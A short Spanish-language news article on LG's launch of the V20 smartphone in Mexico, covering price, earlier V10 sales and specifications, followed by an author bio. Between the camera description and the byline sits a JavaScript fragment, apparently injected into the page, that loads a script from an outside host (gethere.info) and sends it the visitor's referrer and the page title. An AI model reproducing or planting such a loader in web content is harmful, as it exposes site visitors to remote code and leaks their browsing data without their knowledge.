Lanza LG su nuevo celular V20 en México

16 mil pesos será el costo del nuevo teléfono.

CDMX.- La compañía de tecnología LG Electronics presentó en México su nuevo teléfono inteligente V20, con el cual mantiene su apuesta por el segmento premium en el País, y espera aumentar su participación en el mercado.

El vicepresidente de Mobile Communications de LG en México, Ricardo Moreno, explicó que la versión anterior de este teléfono (V10) vendió alrededor de 10 mil unidades durante su ciclo de venta que fluctuó entre 10 y 12 meses.

CARACTERÍSTICAS
Entre algunas características del teléfono destaca una pantalla de 5.7 pulgadas, batería desmontable de 3 mil 200 mAh, la cual promete una duración de un día con actividad constante, sistema operativo Android Nougat y audio Hi-Fi para una mejor resolución.

Asimismo cuenta con tres cámaras, una al frente y dos en la parte posterior del teléfono, que permiten tomas más amplias, así como un enfoque híbrido que ofrece óptima nitidez, y disparo automático que simplifica tomar autofotos.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado